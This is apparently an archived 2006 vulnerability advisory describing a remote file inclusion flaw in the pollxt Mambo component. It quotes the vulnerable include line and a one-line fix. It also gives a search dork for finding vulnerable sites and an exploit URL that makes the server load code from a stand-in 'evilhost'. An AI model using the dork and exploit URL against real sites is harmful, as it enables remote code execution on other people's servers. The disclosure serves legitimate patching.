pollxt Mambo Component <= 1.22.07 Remote Include Vulnerability

2006-07-17T00:00:00
ID SSV:16286
Type seebug
Reporter Root
Modified 2006-07-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Application : pollxt mambo Component
 
URL : http://www.mamboxt.com
 
Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on
in components/com_pollxt/conf.pollxt.php on line 1-2
 
require_once($mosConfig_absolute_path."/administrator/components/com_pollxt/pollxt.class.php");

Exploit:
~~~~~~~~

dork: inurl:"com_pollxt"
 
http://www.vuln.com/components/com_pollxt/conf.pollxt.php?mosConfig_absol
ute_path=http://evilhost

Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

vitux

# milw0rm.com [2006-07-17]